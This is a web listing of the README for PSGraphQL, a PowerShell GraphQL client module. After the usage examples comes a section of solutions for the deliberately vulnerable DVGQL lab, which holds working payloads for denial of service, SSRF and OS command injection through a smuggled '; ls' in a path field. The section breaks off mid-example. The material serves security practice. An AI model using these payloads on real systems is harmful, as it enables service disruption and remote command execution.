SkillAgentSearch skills...

PSGraphQL

This PowerShell module contains functions that facilitate querying and create, update, and delete operations (mutations) for GraphQL, which is an an open-source data language for APIs. For more on GraphQL please see: https://graphql.org/.

GenerateConvertImprove

Install / Use

/learn @anthonyg-1/PSGraphQL
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

PSGraphQL

This PowerShell module contains functions that facilitate query and mutation operations against GraphQL endpoints.

Tested on

:desktop_computer: Windows 10/11 :penguin: Linux :apple: MacOS

Requirements

Requires PowerShell 5.1 or above.

Installation

Install-Module -Name PSGraphQL -Repository PSGallery -Scope CurrentUser

Examples

Post a GraphQL query to an endpoint including operation name and variables


$uri = "https://mytargetserver/v1/graphql"

$query = '
    query RollDice($dice: Int!, $sides: Int!) {
        rollDice(numDice: $dice, numSides: $sides)
}'

$opName = "RollDice"

$variables = '
    {
        "dice": 3,
        "sides": 6
    }'

Invoke-GraphQLQuery -Query $query -OperationName $opName -Variables $variables -Uri $uri

Post a GraphQL query with a query defined in a file

$uri = "https://mytargetserver/v1/graphql"

$queryFilePath = "./queries/rolldice.gql"

Invoke-GraphQLQuery -FilePath $queryFilePath -Uri $uri

Post a GraphQL query to an endpoint including operation name and variables as a HashTable


$uri = "https://mytargetserver/v1/graphql"

$query = '
    query RollDice($dice: Int!, $sides: Int!) {
        rollDice(numDice: $dice, numSides: $sides)
}'

$opName = "RollDice"
$variables = @{dice=3; sides=6}

Invoke-GraphQLQuery -Query $query -OperationName $opName -Variables $variables -Uri $uri

Post a GraphQL introspection query to an endpoint with the results returned as JSON

$uri = "https://mytargetserver/v1/graphql"

$introspectionQuery = '
    query allSchemaTypes {
        __schema {
            types {
                name
                kind
                description
            }
        }
    }
'

Invoke-GraphQLQuery -Query $introspectionQuery -Uri $uri -Raw

Post a GraphQL query to an endpoint with the results returned as objects

$uri = "https://mytargetserver/v1/graphql"

$myQuery = '
    query {
        users {
            created_at
            id
            last_seen
            name
        }
    }
'

Invoke-GraphQLQuery -Query $myQuery -Uri $uri

Post a GraphQL mutation to an endpoint with the results returned as JSON

$uri = "https://mytargetserver/v1/graphql"

$myMutation = '
    mutation MyMutation {
        insert_users_one(object: {id: "57", name: "FirstName LastName"}) {
        id
    }
}
'

$requestHeaders = @{ "x-api-key"='aoMGY{+93dx&t!5)VMu4pI8U8T.ULO' }

$jsonResult = Invoke-GraphQLQuery -Mutation $myMutation -Headers $requestHeaders -Uri $uri -Raw

Post a GraphQL query using JWT for authentication to an endpoint and navigate the results

$jwt = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2MjAzOTMwMjgsIm5iZiI6MTYyMDM5MzAyNywiZXhwIjoxNjIwMzkzMzI4LCJzdWIiOiJtZUBjb21wYW55LmNvbSIsImp0aSI6ImMwZTk0ZTY0ODc4ZjRlZDFhZWM3YWYwYzViOWM2ZWI5Iiwicm9sZSI6InVzZXIifQ.HaTXDunEjmyUsHs7daLe-AxEpmq58QqqFziydm7MBic"

$headers = @{Authorization="Bearer $jwt"}

$uri = "https://mytargetserver/v1/graphql"

$myQuery = '
    query GetUsers {
        users {
            created_at
            id
            last_seen
            name
    }
}
'

$result = Invoke-GraphQLQuery -Query $myQuery -Headers $headers -Uri $uri
$result.data.users | Format-Table

Post a GraphQL query to an endpoint with the results returned as JSON (as a one-liner using aliases)

gql -q 'query { users { created_at id last_seen name } }' -u 'https://mytargetserver/v1/graphql' -r

Get a list of variable definitions from a GraphQL query

$query = '
    query RollDice($dice: Int!, $sides: Int) {
        rollDice(numDice: $dice, numSides: $sides)
}'

Get-GraphQLVariableList -Query $query

Perform parameter fuzzing against a GraphQL endpoint based on discovered parameters (security testing)

$mutation = '
    mutation AddNewPet ($name: String!, $petType: PetType, $petLocation: String!, $petId: Int!) {
            addPet(name: $name, petType: $petType, location: $petLocation, id: $petId) {
            name
            petType
            location
            id
        }
    }'

$wordListPath = ".\SQL.txt"
$words = [IO.File]::ReadAllLines($wordListPath)

$uri = "https://mytargetserver/v1/graphql"

# Array to store results from Invoke-GraphQLQuery -Detailed for later analysis:
$results = @()

# Get the variable definition from the supplied mutation:
$variableList = $mutation | Get-GraphQLVariableList

$words | ForEach-Object {
    $queryVarTable = @{}
    $word = $_

    $variableList | Select Parameter, Type | ForEach-Object {
        $randomInt = Get-Random       
        if ($_.Type -eq "Int") {
            if (-not($queryVarTable.ContainsKey($_.Parameter))) {
                $queryVarTable.Add($_.Parameter, $randomInt)               
            }
        }
        else {
            if (-not($queryVarTable.ContainsKey($_.Parameter))) {
                $queryVarTable.Add($_.Parameter, $word)                
            }
        }
    }

    $gqlResult = Invoke-GraphQLQuery -Mutation $mutation -Variables $queryVarTable -Headers $headers -Uri $uri -Detailed    
    $result = [PSCustomObject]@{ParamValues = ($queryVarTable); Result = ($gqlResult) }    
    $results += $result
}

Damn Vulnerable GraphQL Application Solutions

The "Damn Vulnerable GraphQL Application" is an intentionally vulnerable implementation of the GraphQL technology that allows a tester to learn and practice GraphQL security. For more on DVGQL, please see: https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application

The solutions below are written in PowerShell exclusively but one of the solutions required Invoke-WebRequest as opposed to Invoke-GraphQLQuery.

# GraphQL endpoint for all solutions below:
$gqlEndpointUri = "https://mygraphqlserver.company.com/graphql"

Denial of Service :: Batch Query Attack

# Specify amount of queries to generate:
$amountOfQueries = 100

# Base query:
$sysUpdateQuery = '
query {
    systemUpdate
}
'

# For 1 to $amountOfQueries, concatenate $sysUpdateQuery and assign to $batchQueryAttackPayload:
$batchQueryAttackPayload = ((1..$amountOfQueries | ForEach-Object { $sysUpdateQuery }).Trim()) -join "`r`n"

# Post batch attack to GraphQL endpoint:
Invoke-GraphQLQuery -Uri $gqlEndpointUri -Query $batchQueryAttackPayload

Denial of Service :: Deep Recursion Query Attack


$depthAttackQuery = '
query {
      pastes {
        owner {
          paste {
            edges {
              node {
                  owner {
                    paste {
                      edges {
                        node {
                          owner {
                            paste {
                              edges {
                                node {
                                  owner {
                                    id
                                  }
                                }
                              }
                            }
                          }
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
'

Invoke-GraphQLQuery -Query $depthAttackQuery -Uri $gqlEndpointUri -Raw

Denial of Service :: Resource Intensive Query Attack

$timingTestPayload = '
    query TimingTest {
      systemUpdate
    }
'

$start = Get-Date

Invoke-GraphQLQuery -Query $timingTestPayload -Uri $gqlEndpointUri -Raw

$end = Get-Date

$delta = $end - $start
$totalSeconds = $delta.Seconds
$message = "Total seconds to execute query: {0}" -f $totalSeconds

Write-Host -Object $message -ForegroundColor Cyan

Information Disclosure :: GraphQL Introspection

$introspectionQuery = '
  query {
      __schema {
        queryType { name }
        mutationType { name }
        subscriptionType { name }
      }
    }
'

Invoke-GraphQLQuery -Query $introspectionQuery -Uri $gqlEndpointUri -Raw

Information Disclosure :: GraphQL Interface


$graphiqlUri = "{0}/graphiql" -f $targetUri

$headers = @{Accept="text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"}

Invoke-WebRequest -Uri $graphiqlUri -Headers $headers -Method Get -UseBasicParsing | Select -ExpandProperty Content

Information Disclosure :: GraphQL Field Suggestions

$fieldSuggestionsQuery = '
    query {
        systemUpdate
    }
'

Invoke-GraphQLQuery -Query $fieldSuggestionsQuery -Uri $gqlEndpointUri -Raw

Information Disclosure :: Server Side Request Forgery

$requestForgeryMutation = '
mutation {
    importPaste(host:"localhost", port:57130, path:"/", scheme:"http") {
      result
    }
}
'

Invoke-GraphQLQuery -Mutation $requestForgeryMutation -Uri $gqlEndpointUri -Raw

Code Execution :: OS Command Injection #1

$commandToInject = "ls -al"

$commandInjectionMutation = '
  mutation  {
    importPaste(host:"localhost", port:80, path:"/ ; ' + $commandToInject + '", scheme:"http"){
      result
    }
  }
'

$response = Invoke-GraphQLQuery -Mutation $commandInjectionMutation -Uri $gqlEndpointUri

$result = $response.data.importPaste.result

Write-Host -Object $result -ForegroundColor Magenta

Code Execution :: OS Command Injection #2

# Admin creds for DVGQL:
$userName = "admin"
$password = "password"

$commandToInject = "ls -alr"

$commandInjectionQuery = '
    query {
        systemDiagnostics(username:"' + $userName + '" password:"' + $password + '", cmd:"id; ' + $commandToInject + '")
    }
'

Invoke-GraphQLQuery -Query $commandInjectionQuery -Uri $gqlEndpointUri -Raw

Code Execution :: OS Command Injection #3

# Admin creds for DVGQL:
$userName = "admin"
$passw

anthonyg-1

View profile

View on GitHub
GitHub Stars60
CategoryProduct
Updated2mo ago
Forks9
anthonyg-1/PSGraphQL

Languages

PowerShell

Security Score

100/100

Audited on Jan 9, 2026

No findings